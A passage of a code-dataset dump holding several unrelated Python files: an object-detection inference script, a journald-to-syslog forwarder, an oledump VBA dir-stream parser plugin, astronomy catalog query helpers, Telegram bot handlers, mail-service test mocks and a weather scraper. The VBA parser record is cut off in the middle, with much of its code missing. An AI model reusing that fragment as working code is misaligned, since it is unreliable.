optim\r\nfrom torchvision import datasets, transforms\r\nimport torchvision.models as models\r\nfrom torch.optim.lr_scheduler import StepLR\r\nfrom torch.utils.data import TensorDataset, DataLoader, Dataset\r\n\r\nimport json\r\nfrom PIL import Image\r\n\r\n\r\nPATH = './HW2_net_cos.pth'\r\nfile_path = 'test/test/'\r\n\r\n# Transform\r\n\r\ntransform_test = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\n\r\n# Load dataset\r\n\r\n\r\nclass MyDataset(Dataset):\r\n def __init__(self, img_dir, img_list, transform):\r\n super(MyDataset, self).__init__()\r\n self.img_dir = img_dir\r\n self.img_list = img_list\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.img_list)\r\n\r\n def __getitem__(self, idx):\r\n img = Image.open(self.img_dir + self.img_list[idx])\r\n return self.transform(img)\r\n\r\n\r\nif __name__ == '__main__':\r\n submission = []\r\n net = torch.load(PATH)\r\n submission = []\r\n test_img_list = []\r\n output_list = {}\r\n test_img_list = os.listdir(\"test/test\")\r\n\r\n test_loader = DataLoader(MyDataset(\"test/test/\",\r\n test_img_list,\r\n transform_test),\r\n batch_size=1,\r\n shuffle=False,\r\n num_workers=0)\r\n\r\n with torch.no_grad():\r\n net.eval()\r\n for i, img in enumerate(test_loader, 0):\r\n pred = net(img)\r\n output_list[test_img_list[i]] = pred[0]\r\n\r\n for img_name in test_img_list:\r\n print(img_name)\r\n # the image_name is as same as the image_id\r\n image_id = int(img_name[:-4])\r\n # add each detection box infomation into list\r\n box_num = int(output_list[img_name]['boxes'].size()[0])\r\n for box in range(box_num):\r\n det_box_info = {}\r\n\r\n # An integer to identify the image\r\n det_box_info[\"image_id\"] = image_id\r\n\r\n # A list ( [left_x, top_y, width, height] )\r\n left = output_list[img_name][\"boxes\"][box][0].item()\r\n top = output_list[img_name][\"boxes\"][box][1].item()\r\n width = output_list[img_name][\"boxes\"][box][2].item() - left\r\n height = output_list[img_name][\"boxes\"][box][3].item() - top\r\n det_box_info[\"bbox\"] = [left, top, width, height]\r\n # Float number between 0 ~ 1 which means the confidence of the bbox\r\n det_box_info[\"score\"] = output_list[img_name][\"scores\"][box].item()\r\n\r\n # An integer which means the label class\r\n det_box_info[\"category_id\"] = output_list[img_name][\"labels\"][box].item() + 1\r\n print(det_box_info)\r\n submission.append(det_box_info)\r\n\r\n # Write the list to answer.json\r\n json_object = json.dumps(submission, indent=4)\r\n\r\n with open(\"answer.json\", \"w\") as outfile:\r\n outfile.write(json_object)\r\n","repo_name":"Mintair/VRDL_HW2","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43274704315","text":"#!/bin/python \n\n\"\"\"\nthis scripts pull log from journald then reassemble to syslog format and send to the udp port\n\nusage: $1 [[host] port]\nexample:\n$1 localhost\n$1 localhost 1514\n\"\"\"\nimport socket\nimport sys\nimport json\nimport os\nimport syslog\nimport datetime\n\nPORT=1514\nHOST=\"localhost\"\nFILE=\"./log.json\"\n\nGROUP=[\"SYSLOG_FACILITY\", \"SYSLOG_PID\", \"PRIORITY\", \"SYSLOG_IDENTIFIER\", \"MESSAGE\"]\n\ndef get_id(cursor):\n payload = dict([i.split('=') for i in cursor.split(';')])\n return payload['x']\n\ndef get_struct(obj):\n struct = {i: obj[i] for i in obj if i[0] != '_' and i not in GROUP}\n if len(struct) == 0:\n return ' -'\n ret = \" [test {}]\".format(\" \".join(i + '=' + json.dumps(j) for i, j in struct.items() if '\\n' not in j))\n return ret\n\ndef send_log(obj):\n try:\n pri = int(obj.get('SYSLOG_FACILITY', obj.get(\"PRIORITY\", 0))) + 8 * 10\n ts = datetime.datetime.fromtimestamp(int(obj['__REALTIME_TIMESTAMP']) / 1e6).isoformat() + 'Z'\n hostname = obj['_HOSTNAME']\n appname = obj.get('_EXE', '???')\n procid = obj['_PID']\n msgid = get_id(obj['__CURSOR'])\n \n data = \"<{}>1 {} {} {} {} {}\".format(pri, ts, hostname, appname, procid, msgid)\n data += get_struct(obj)\n data += ' ' + obj['MESSAGE']\n s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.sendto(data.encode(\"utf8\"), (HOST, PORT))\n except:\n print(obj)\n # print(data)\n\n\ndef getLogs():\n logs = []\n if os.path.exists(FILE):\n with open(FILE) as fp:\n for num, line in enumerate(fp):\n try:\n yield json.loads(line)\n except ValueError:\n print(\"bad line {}\".format(num))\n else:\n # load data from journal daemon directly\n pass\n\ndef genSyslog():\n for log in getLogs():\n send_log(log)\n\ndef main():\n global s\n if len(sys.argv) == 4:\n PORT = int(sys.argv[3])\n if len(sys.argv) == 3:\n HOST = sys.argv[2]\n \n genSyslog()\n\nif __name__ == \"__main__\":\n main()","repo_name":"pandada8/logd","sub_path":"scripts/journald-to-syslog.py","file_name":"journald-to-syslog.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9668300284","text":"#!/usr/bin/env python\n\n__description__ = 'VBA dir stream parser for oledump.py'\n__author__ = 'Didier Stevens'\n__version__ = '0.0.1'\n__date__ = '2023/04/23'\n\n\"\"\"\n\nSource code put in public domain by Didier Stevens, no Copyright\nhttps://DidierStevens.com\nUse at your own risk\n\nHistory:\n 2023/04/23: start\n\nTodo:\n write parser for REFERENCECONTROL\n\"\"\"\n\n#https://interoperability.blob.core.windows.net/files/MS-OVBA/%5bMS-OVBA%5d.pdf\n\ndef ParseREFERENCEREGISTERED(data):\n oStruct = cStruct(data)\n stringSize = oStruct.Unpack(''), dataParsed))\n if recordType == TERMINATOR:\n break\n remainder = oStruct.GetBytes()\n if remainder != b'':\n result.append('Warning: remainder = %s' % repr(remainder))\n else:\n result.append('Decompression error')\n\n self.ran = True\n\n return result\n\nAddPlugin(cVBADir)\n","repo_name":"DidierStevens/DidierStevensSuite","sub_path":"plugin_vba_dir.py","file_name":"plugin_vba_dir.py","file_ext":"py","file_size_in_byte":8387,"program_lang":"python","lang":"en","doc_type":"code","stars":1733,"dataset":"github-code","pt":"72"} +{"seq_id":"15161156549","text":"H, W = map(int, input().split())\r\nS = [list(input()) for i in range(H)]\r\nmemo = [[None] * W for i in range(H)]\r\n\r\n\r\ndef dfs(x, y):\r\n global memo\r\n if y >= H or x >= W or S[y][x] == \"#\":\r\n return True\r\n\r\n if memo[y][x] is not None:\r\n return memo[y][x]\r\n\r\n result = False\r\n if not dfs(x+1, y): result = True\r\n if not dfs(x, y+1): result = True\r\n if not dfs(x+1, y+1): result = True\r\n memo[y][x] = result\r\n return result\r\n\r\n\r\nprint(\"First\" if dfs(0, 0) else \"Second\")","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc038/B/2751451.py","file_name":"2751451.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"10709559033","text":"from __future__ import print_function\nimport numpy as np\nfrom astropy.table import Table\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport pylab\nimport os\nimport pandas as pd\nfrom astropy.io import fits\nfrom astropy.visualization import PercentileInterval, AsinhStretch\nimport csv\nfrom astropy.io import ascii\nfrom astropy.table import Table\nimport sys\nimport re\nimport pylab\nimport json\nimport requests\nfrom datetime import datetime\nfrom astropy import units as u\nfrom astropy.coordinates import Angle\ntry: # Python 3.x\n from urllib.parse import quote as urlencode\n from urllib.request import urlretrieve\nexcept ImportError: # Python 2.x\n from urllib import pathname2url as urlencode\n from urllib import urlretrieve\n\ntry: # Python 3.x\n import http.client as httplib\nexcept ImportError: # Python 2.x\n import httplib\n# std lib\nfrom collections import OrderedDict\nfrom os import listdir\nfrom os.path import isfile, join\n# 3rd party\nfrom astropy import utils, io, convolution, wcs\nfrom astropy.visualization import make_lupton_rgb\nfrom astropy.coordinates import name_resolve\n#from pyvo.dal import sia\nimport pickle\n\ndef getAllPostageStamps(df, tempSize, path=\"/home/alexgagliano/Documents/Research/Transient_ML_Box/PS1_PostageStamps/pngs/\"):\n for i in np.arange(len(df[\"rra\"])):\n tempRA = df.loc[i, 'rra']\n tempDEC = df.loc[i, 'rdec']\n a = find_all(path+\"/%i.png\" % df.loc[i, 'objID'], path)\n if not a:\n img = getcolorim(tempRA, tempDEC, size=tempSize, filters=\"grizy\", format=\"png\")\n img.save(path+\"/%i.png\" % df.loc[i, 'objID'])\n print(\"Saved %i\"%(i))\n\ndef preview_image(i, ra, dec, rad, band):\n a = find_all(\"PS1_ra={}_dec={}_{}arcsec_{}.fits\".format(tempRA, tempDEC, rad, band), \".\")\n hdul = fits.open(a[0])\n image_file = get_pkg_data_filename(a[0])\n image_data = fits.getdata(image_file, ext=0)\n plt.figure()\n plt.imshow(image_data,cmap='viridis')\n plt.axis('off')\n #plt.colorbar()\n plt.savefig(\"PS1_%i_%s.png\" % (i, band))\n\ndef get_hosts(path, transient_fn, fn_Host, rad):\n transient_df = pd.read_csv(path+transient_fn)\n now = datetime.now()\n dateStr = \"%i%.02i%.02i\" % (now.year,now.month,now.day)\n dict_fn = fn_Host.strip(\".csv\") + \".p\"\n find_host_info_PS1(transient_df, fn_Host, dict_fn, path, rad)\n host_df = pd.read_csv(path+fn_Host)\n host_df = host_df.drop_duplicates()\n host_df.to_csv(path+fn_Host.strip(\".csv\")+\"_cleaned.csv\")\n\ndef find_all(name, path):\n result = []\n for root, dirs, files in os.walk(path):\n if name in files:\n result.append(os.path.join(root, name))\n return result\n\ndef getimages(ra,dec,size=240,filters=\"grizy\"):\n\n \"\"\"Query ps1filenames.py service to get a list of images\n\n ra, dec = position in degrees\n size = image size in pixels (0.25 arcsec/pixel)\n filters = string with filters to include\n Returns a table with the results\n \"\"\"\n\n service = \"https://ps1images.stsci.edu/cgi-bin/ps1filenames.py\"\n url = (\"{service}?ra={ra}&dec={dec}&size={size}&format=fits\"\n \"&filters={filters}\").format(**locals())\n table = Table.read(url, format='ascii')\n return table\n\n\ndef geturl(ra, dec, size=240, output_size=None, filters=\"grizy\", format=\"jpg\", color=False):\n\n \"\"\"Get URL for images in the table\n\n ra, dec = position in degrees\n size = extracted image size in pixels (0.25 arcsec/pixel)\n output_size = output (display) image size in pixels (default = size).\n output_size has no effect for fits format images.\n filters = string with filters to include\n format = data format (options are \"jpg\", \"png\" or \"fits\")\n color = if True, creates a color image (only for jpg or png format).\n Default is return a list of URLs for single-filter grayscale images.\n Returns a string with the URL\n \"\"\"\n\n if color and format == \"fits\":\n raise ValueError(\"color images are available only for jpg or png formats\")\n if format not in (\"jpg\",\"png\",\"fits\"):\n raise ValueError(\"format must be one of jpg, png, fits\")\n table = getimages(ra,dec,size=size,filters=filters)\n url = (\"https://ps1images.stsci.edu/cgi-bin/fitscut.cgi?\"\n \"ra={ra}&dec={dec}&size={size}&format={format}\").format(**locals())\n if output_size:\n url = url + \"&output_size={}\".format(output_size)\n # sort filters from red to blue\n flist = [\"yzirg\".find(x) for x in table['filter']]\n table = table[np.argsort(flist)]\n if color:\n if len(table) > 3:\n # pick 3 filters\n table = table[[0,len(table)//2,len(table)-1]]\n for i, param in enumerate([\"red\",\"green\",\"blue\"]):\n url = url + \"&{}={}\".format(param,table['filename'][i])\n else:\n urlbase = url + \"&red=\"\n url = []\n for filename in table['filename']:\n url.append(urlbase+filename)\n return url\n\n\ndef getcolorim(ra, dec, size=240, output_size=None, filters=\"grizy\", format=\"jpg\"):\n\n \"\"\"Get color image at a sky position\n\n ra, dec = position in degrees\n size = extracted image size in pixels (0.25 arcsec/pixel)\n output_size = output (display) image size in pixels (default = size).\n output_size has no effect for fits format images.\n filters = string with filters to include\n format = data format (options are \"jpg\", \"png\")\n Returns the image\n \"\"\"\n\n if format not in (\"jpg\",\"png\"):\n raise ValueError(\"format must be jpg or png\")\n url = geturl(ra,dec,size=size,filters=filters,output_size=output_size,format=format,color=True)\n r = requests.get(url)\n im = Image.open(BytesIO(r.content))\n return im\n\n\ndef getgrayim(ra, dec, size=240, output_size=None, filter=\"g\", format=\"jpg\"):\n\n \"\"\"Get grayscale image at a sky position\n\n ra, dec = position in degrees\n size = extracted image size in pixels (0.25 arcsec/pixel)\n output_size = output (display) image size in pixels (default = size).\n output_size has no effect for fits format images.\n filter = string with filter to extract (one of grizy)\n format = data format (options are \"jpg\", \"png\")\n Returns the image\n \"\"\"\n\n if format not in (\"jpg\",\"png\"):\n raise ValueError(\"format must be jpg or png\")\n if filter not in list(\"grizy\"):\n raise ValueError(\"filter must be one of grizy\")\n url = geturl(ra,dec,size=size,filters=filter,output_size=output_size,format=format)\n r = requests.get(url[0])\n im = Image.open(BytesIO(r.content))\n return im\n\n\ndef get_PS1_Pic(ra, dec, rad, band):\n fitsurl = geturl(ra, dec, size=rad, filters=\"{}\".format(band), format=\"fits\")\n print(fitsurl[0])\n fh = fits.open(fitsurl[0])\n print(fh)\n fh.writeto('./fits/PS1_ra={}_dec={}_{}arcsec_{}.fits'.format(ra, dec, int(rad*0.25), band))\n\n# Data Lab\n#from dl import queryClient as qc\n#from dl.helpers.utils import convert\n\n# set up Simple Image Access (SIA) service\nDEF_ACCESS_URL = \"http://datalab.noao.edu/sia/des_dr1\"\nsvc = sia.SIAService(DEF_ACCESS_URL)\n\n##################### PS1 HELPER FUNCTIONS ############################################\ndef ps1metadata(table=\"mean\",release=\"dr1\",baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\"):\n \"\"\"Return metadata for the specified catalog and table\n\n Parameters\n ----------\n table (string): mean, stack, or detection\n release (string): dr1 or dr2\n baseurl: base URL for the request\n\n Returns an astropy table with columns name, type, description\n \"\"\"\n\n checklegal(table,release)\n url = \"{baseurl}/{release}/{table}/metadata\".format(**locals())\n r = requests.get(url)\n r.raise_for_status()\n v = r.json()\n # convert to astropy table\n tab = Table(rows=[(x['name'],x['type'],x['description']) for x in v],\n names=('name','type','description'))\n return tab\n\n\ndef mastQuery(request):\n \"\"\"Perform a MAST query.\n\n Parameters\n ----------\n request (dictionary): The MAST request json object\n\n Returns head,content where head is the response HTTP headers, and content is the returned data\"\"\"\n\n server='mast.stsci.edu'\n\n # Grab Python Version\n version = \".\".join(map(str, sys.version_info[:3]))\n\n # Create Http Header Variables\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"text/plain\",\n \"User-agent\":\"python-requests/\"+version}\n\n # Encoding the request as a json string\n requestString = json.dumps(request)\n requestString = urlencode(requestString)\n\n # opening the https connection\n conn = httplib.HTTPSConnection(server)\n\n # Making the query\n conn.request(\"POST\", \"/api/v0/invoke\", \"request=\"+requestString, headers)\n\n # Getting the response\n resp = conn.getresponse()\n head = resp.getheaders()\n content = resp.read().decode('utf-8')\n\n # Close the https connection\n conn.close()\n\n return head,content\n\ndef resolve(name):\n \"\"\"Get the RA and Dec for an object using the MAST name resolver\n\n Parameters\n ----------\n name (str): Name of object\n\n Returns RA, Dec tuple with position\"\"\"\n\n resolverRequest = {'service':'Mast.Name.Lookup',\n 'params':{'input':name,\n 'format':'json'\n },\n }\n headers,resolvedObjectString = mastQuery(resolverRequest)\n resolvedObject = json.loads(resolvedObjectString)\n # The resolver returns a variety of information about the resolved object,\n # however for our purposes all we need are the RA and Dec\n try:\n objRa = resolvedObject['resolvedCoordinate'][0]['ra']\n objDec = resolvedObject['resolvedCoordinate'][0]['decl']\n except IndexError as e:\n raise ValueError(\"Unknown object '{}'\".format(name))\n return (objRa, objDec)\n\ndef checklegal(table,release):\n \"\"\"Checks if this combination of table and release is acceptable\n\n Raises a VelueError exception if there is problem\n \"\"\"\n\n releaselist = (\"dr1\", \"dr2\")\n if release not in (\"dr1\",\"dr2\"):\n raise ValueError(\"Bad value for release (must be one of {})\".format(', '.join(releaselist)))\n if release==\"dr1\":\n tablelist = (\"mean\", \"stack\")\n else:\n tablelist = (\"mean\", \"stack\", \"detection\")\n if table not in tablelist:\n raise ValueError(\"Bad value for table (for {} must be one of {})\".format(release, \", \".join(tablelist)))\n\ndef ps1search(table=\"mean\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False,**kw):\n \"\"\"Do a general search of the PS1 catalog (possibly without ra/dec/radius)\n\n Parameters\n ----------\n table (string): mean, stack, or detection\n release (string): dr1 or dr2\n format: csv, votable, json\n columns: list of column names to include (None means use defaults)\n baseurl: base URL for the request\n verbose: print info about request\n **kw: other parameters (e.g., 'nDetections.min':2). Note this is required!\n \"\"\"\n\n data = kw.copy()\n if not data:\n raise ValueError(\"You must specify some parameters for search\")\n checklegal(table,release)\n if format not in (\"csv\",\"votable\",\"json\"):\n raise ValueError(\"Bad value for format\")\n url = \"{baseurl}/{release}/{table}.{format}\".format(**locals())\n if columns:\n # check that column values are legal\n # create a dictionary to speed this up\n dcols = {}\n for col in ps1metadata(table,release)['name']:\n dcols[col.lower()] = 1\n badcols = []\n for col in columns:\n if col.lower().strip() not in dcols:\n badcols.append(col)\n if badcols:\n raise ValueError('Some columns not found in table: {}'.format(', '.join(badcols)))\n # two different ways to specify a list of column values in the API\n # data['columns'] = columns\n data['columns'] = '[{}]'.format(','.join(columns))\n\n# either get or post works\n# r = requests.post(url, data=data)\n r = requests.get(url, params=data)\n\n if verbose:\n print(r.url)\n r.raise_for_status()\n if format == \"json\":\n return r.json()\n else:\n return r.text\n\n\ndef ps1cone(ra,dec,radius,table=\"stack\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False,**kw):\n \"\"\"Do a cone search of the PS1 catalog\n\n Parameters\n ----------\n ra (float): (degrees) J2000 Right Ascension\n dec (float): (degrees) J2000 Declination\n radius (float): (degrees) Search radius (<= 0.5 degrees)\n table (string): mean, stack, or detection\n release (string): dr1 or dr2\n format: csv, votable, json\n columns: list of column names to include (None means use defaults)\n baseurl: base URL for the request\n verbose: print info about request\n **kw: other parameters (e.g., 'nDetections.min':2)\n \"\"\"\n\n data = kw.copy()\n data['ra'] = ra\n data['dec'] = dec\n data['radius'] = radius\n return ps1search(table=table,release=release,format=format,columns=columns,\n baseurl=baseurl, verbose=verbose, **data)\n\n#########################END PS1 HELPER FUNCTIONS##############################################\n\ndef create_df(tns_loc):\n \"\"\"Combine all supernovae data into dataframe\"\"\"\n files = [f for f in listdir(tns_loc) if isfile(join(tns_loc, f))]\n arr = []\n for file in files:\n tempPD = pd.read_csv(tns_loc+file)\n arr.append(tempPD)\n df = pd.concat(arr)\n df = df.loc[df['RA'] != '00:00:00.000']\n df = df.drop_duplicates()\n df = df.replace({'Anon.': ''})\n df = df.replace({'2019-02-13.49': ''})\n df = df.apply(lambda x: x.str.strip() if x.dtype == \"object\" else x)\n return df\n #df.to_csv('SNe_TNS_061019.csv')\n\ndef query_ps1_noname(RA, DEC, rad):\n #print(\"Querying PS1 for nearest host...\")\n return ps1cone(RA,DEC,rad/3600,table=\"stack\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False)\n\ndef query_ps1_name(name, rad):\n #print(\"Querying PS1 with host name!\")\n [ra, dec] = resolve(name)\n return ps1cone(ra,dec,rad/3600,table=\"stack\",release=\"dr1\",format=\"csv\",columns=None,baseurl=\"https://catalogs.mast.stsci.edu/api/v0.1/panstarrs\", verbose=False)\n\n# Queries PS1 to find host info for each transient\n# Input: df - a dataframe of all spectroscopically classified transients in TNS\n# fn - the output data frame of all PS1 potential hosts\n# dict_fn - the dictionary matching candidate hosts in PS1 and transients\n# Output: N/A\ndef find_host_info_PS1(df, fn, dict_fn, path, rad):\n i = 0\n \"\"\"Querying PS1 for all objects within rad arcsec of SNe\"\"\"\n os.chdir(path)\n # SN_Host_PS1 - the dictionary to map SN IDs to nearby obj IDs in PS1\n SN_Host_PS1 = {}\n # PS1_queries - an array of relevant PS1 obj info\n PS1_queries = []\n for j, row in enumerate(df.itertuples(), 1):\n tempRA = Angle(row.RA, unit=u.hourangle)\n tempDEC = Angle(row.DEC, unit=u.deg)\n tempName = row.HostName\n a = ''\n if(row.HostName is ''): # and (int(row.DEC[0:3]) > -30)):\n a = query_ps1_noname(tempRA.degree,tempDEC.degree, rad)\n else:\n try:\n a = query_ps1_name(tempName, rad)\n except:\n a = query_ps1_noname(tempRA.degree,tempDEC.degree, rad)\n if a:\n a = ascii.read(a)\n a = a.to_pandas()\n PS1_queries.append(a)\n SN_Host_PS1[row.ID] = np.array(a['objID'])\n else:\n SN_Host_PS1[row.ID] = np.array([])\n\n # Print status messages every 10 lines\n if j%10 == 0:\n print(\"Processed {} of {} lines!\".format(j, len(df.ID)))\n #print(SN_Host_PS1)\n\n # Print every query to a file Note: this was done in order\n # to prevent the code crashing after processing 99% of the data\n # frame and losing everything. This allows for duplicates though,\n # so they should be removed before the file is used again\n if (len(PS1_queries) > 0):\n PS1_hosts = pd.concat(PS1_queries)\n PS1_hosts = PS1_hosts.drop_duplicates()\n PS1_queries = []\n else:\n print(\"No potential hosts found for this object...\")\n # Save host info\n if i == 0:\n PS1_hosts.to_csv(fn, header=True)\n i = 1\n else:\n PS1_hosts.to_csv(fn, mode='a+', header=False)\n\n with open(\"./dictionaries/\" + dict_fn, 'wb') as fp:\n pickle.dump(SN_Host_PS1, fp, protocol=pickle.HIGHEST_PROTOCOL)\n","repo_name":"CheerfulUser/calibration","sub_path":"kepler/PS1QueryFunctions.py","file_name":"PS1QueryFunctions.py","file_ext":"py","file_size_in_byte":16908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8657188563","text":"from aiogram import types, Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Command\n\nfrom keyboards.reply.main_menu import main_menu\n\n\nasync def start(message: types.Message, state: FSMContext):\n is_state = await state.get_state()\n if is_state:\n await state.finish()\n\n text = [\n \"Спасибо, что выбрали нас!\",\n \"Выберите в меню, что хотите сделать.\"\n ]\n\n await message.answer('\\n'.join(text), reply_markup=main_menu)\n\n\nasync def back_main(message: types.Message, state: FSMContext):\n await state.finish()\n await message.answer('Главное меню', reply_markup=main_menu)\n\n\ndef register_start(dp: Dispatcher):\n dp.register_message_handler(start, Command(['start']), state='*')\n dp.register_message_handler(back_main, state='*', text='⏪Назад')\n","repo_name":"vnj64/VkCommentsBot","sub_path":"bot_handlers/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"164075679","text":"import asyncio\nimport re\nfrom collections import defaultdict\nfrom functools import partial\nfrom typing import Optional\n\nimport pytest\nimport ujson\nfrom aiohttp import ClientSession, TCPConnector, web\n\nfrom aresponses import ResponsesMockServer as BaseResponsesMockServer\nfrom aresponses.utils import ANY\nfrom mail.beagle.beagle.interactions import InteractionClients\nfrom mail.beagle.beagle.tests.utils import get_url_part\n\n\n@pytest.fixture\nasync def clients(test_logger, request_id):\n clients = InteractionClients(test_logger, request_id)\n async with clients:\n yield clients\n\n\nclass ResponsesMockServer(BaseResponsesMockServer):\n async def passthrough(self, request):\n connector = TCPConnector()\n connector._resolve_host = partial(self._old_resolver_mock, connector)\n\n original_request = request.clone(scheme=\"https\" if request.headers[\"AResponsesIsSSL\"] else \"http\")\n headers = {k: v for k, v in request.headers.items() if k != \"AResponsesIsSSL\"}\n\n async with ClientSession(connector=connector) as session:\n request_method = getattr(session, request.method.lower())\n async with request_method(original_request.url, headers=headers, data=(await request.read())) as r:\n headers = {k: v for k, v in r.headers.items() if k.lower() == \"content-type\"}\n text = await r.text()\n response = self.Response(text=text, status=r.status, headers=headers)\n return response\n\n\n@pytest.fixture\nasync def mock_server(event_loop):\n async with ResponsesMockServer(loop=event_loop) as server:\n yield server\n\n\n@pytest.fixture\ndef mock_response_json():\n def _inner(body: dict):\n return web.Response(body=ujson.dumps(body), headers={'Content-Type': 'application/json'})\n\n return _inner\n\n\n@pytest.fixture(autouse=True)\nasync def mock_self(mock_server):\n async def handler(request: Optional[web.BaseRequest] = None):\n mock_server.add(re.compile('127.0.0.1:[0-9]+'), ANY, ANY, handler)\n if request is not None:\n return await mock_server.passthrough(request)\n\n await handler()\n\n\n@pytest.fixture(autouse=True)\ndef mock_tvm(mock_server, mock_response_json, rands, randn):\n def handler_tvm_tickets(request: Optional[web.BaseRequest] = None):\n mock_server.add(ANY, '/tvm/tickets', ANY, handler_tvm_tickets)\n if request is not None:\n return mock_response_json({rands(): {\"ticket\": f\"3:serv:{rands()}\", \"tvm_id\": request.query[\"dsts\"]}})\n\n def handler_tvm_checksrv(request: Optional[web.BaseRequest] = None):\n mock_server.add(ANY, '/tvm/checksrv', ANY, handler_tvm_checksrv)\n if request is not None:\n return mock_response_json({\n \"src\": randn(),\n \"dst\": request.query[\"dst\"],\n \"scopes\": None,\n \"debug_string\": rands(),\n \"logging_string\": rands(),\n \"issuer_uid\": None\n })\n\n handler_tvm_checksrv()\n handler_tvm_tickets()\n\n\n@pytest.fixture\ndef client_requests():\n return defaultdict(list)\n\n\n@pytest.fixture\ndef last_client_request(client_requests): # TODO: remove lambda\n return lambda host: client_requests[host][-1]\n\n\n@pytest.fixture\ndef mock_client(mock_server, mock_response_json, client_requests):\n def _inner(host: str, *args, **kwargs):\n if len(args) == 1:\n responses = args[0]\n elif len(args) == 2:\n responses = {args[0]: args[1]}\n elif 'responses' in kwargs:\n responses = kwargs['responses']\n else:\n raise Exception('Invalid mock_client params')\n\n for path_pattern, response in responses.items():\n if isinstance(response, (dict, list)):\n response = mock_response_json(response)\n\n def handler(resp):\n async def _inner(request):\n await request.read()\n client_requests[host].append(request)\n\n if callable(resp):\n if asyncio.iscoroutinefunction(resp):\n return await resp(request)\n else:\n return resp(request)\n else:\n return resp\n\n return _inner\n\n mock_server.add(host, path_pattern=path_pattern, response=handler(response))\n\n return _inner\n\n\n# Passport\n@pytest.fixture\ndef mock_passport(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.PASSPORT_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_passport_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.PASSPORT_API_URL, 'netloc'))\n\n\n# Directory\n@pytest.fixture\ndef directory_host(beagle_settings):\n return get_url_part(beagle_settings.DIRECTORY_API_URL, 'netloc')\n\n\n@pytest.fixture\ndef mock_directory(directory_host, mock_client):\n return lambda *args, **kwargs: mock_client(directory_host, *args, **kwargs)\n\n\n@pytest.fixture\ndef directory_requests(directory_host, client_requests):\n return client_requests[directory_host]\n\n\n@pytest.fixture\ndef last_directory_request(directory_host, last_client_request):\n return lambda: last_client_request(directory_host)\n\n\n# Blackbox\n@pytest.fixture\ndef mock_blackbox(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.BLACKBOX_API_URL, 'netloc')\n path = get_url_part(beagle_settings.BLACKBOX_API_URL, 'path')\n return lambda response: mock_client(host, path, response)\n\n\n@pytest.fixture\ndef last_blackbox_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.BLACKBOX_API_URL, 'netloc'))\n\n\n@pytest.fixture\ndef blackbox_requests(beagle_settings, client_requests):\n return lambda: client_requests[get_url_part(beagle_settings.BLACKBOX_API_URL, 'netloc')]\n\n\n# Sender\n@pytest.fixture\ndef mock_sender(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.SENDER_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_sender_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.SENDER_API_URL, 'netloc'))\n\n\n# MBody\n@pytest.fixture\ndef mock_mbody(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.MBODY_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_mbody_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.MBODY_API_URL, 'netloc'))\n\n\n# Hound\n@pytest.fixture\ndef mock_hound(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.HOUND_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_hound_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.HOUND_API_URL, 'netloc'))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44478861294","text":"import argparse\nimport requests\nimport pandas as pd\nimport ast\nfrom datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\n\ndef get_data_of_future(future_dates,future_day_temperatures,future_night_temperatures):\n '''\n\n :param future_date: empty list after initialization\n :param future_day_temperature: empty list after initialization\n :param future_night_temperature: empty list after initialization\n :return: future_date: predicted day\n future_day_temperature: day temperature recorded by the website\n future_night_temperature: night temperature recorded by the website\n '''\n for day in range(1, 90):\n file_name = (datetime.now() + timedelta(days=day)).strftime(\"%Y-%m-%d\")\n with open(file_name +'.htm', 'r')as wb_data:\n soup = BeautifulSoup(wb_data, 'lxml')\n future_dates.append(file_name)\n 